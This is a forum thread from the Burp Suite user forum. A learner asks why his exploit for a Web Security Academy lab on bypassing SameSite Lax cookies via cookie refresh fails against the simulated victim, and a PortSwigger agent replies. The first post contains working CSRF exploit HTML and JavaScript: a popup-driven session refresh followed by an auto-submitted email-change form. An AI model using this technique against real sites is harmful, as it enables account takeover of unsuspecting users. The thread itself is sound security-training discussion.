Burp Suite User Forum

Login to post

Lab: SameSite Lax bypass via cookie refresh - Question regarding victim behavior.

Jacek | Last updated: Aug 03, 2023 02:06PM UTC

Hi Team, Is there any specific limitations on victim behavior, like timeout or number of URLs that client enters? I tested exploit on myself and it work. I'm not sure why it's not working on victim. ------------------ <p>Click anywhere on the page</p> <form action="https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="pwnd@o2.pl" /> </form> <script> window.onclick = () => { hack(); }; hack = function(){ var popup = window.open('https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/logout'); setTimeout(function(){popup.location.href = 'https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/my-account';}, 1000); setTimeout(function(){history.pushState('', '', '/');document.forms[0].submit();}, 6000); }; </script> -------------------- Changing actions to: 1. logout 2. social-login 3. submit form also didn't work. I'm wondering if it's my mistake or victims' limitation. Thanks, J

Ben, PortSwigger Agent | Last updated: Aug 04, 2023 07:13AM UTC

Hi Jacek, Have you changed the email address that is being used in your exploit between testing it on yourself and then delivering it to the victim user?

Jacek | Last updated: Aug 04, 2023 08:27AM UTC

Hi Ben, Yes, I did. I try to modify email address with every attempt. Only thing that worked was changing actions to: 1. social-login 2. submit form Thanks, Jacek

Ben, PortSwigger Agent | Last updated: Aug 04, 2023 03:37PM UTC

Hi Jacek, Let me have a chat with the Web Academy team about this so that we can definitively confirm the requirements of the lab. I will update this forum thread in due course.

You need to Log in to post a reply. Or register here, for free.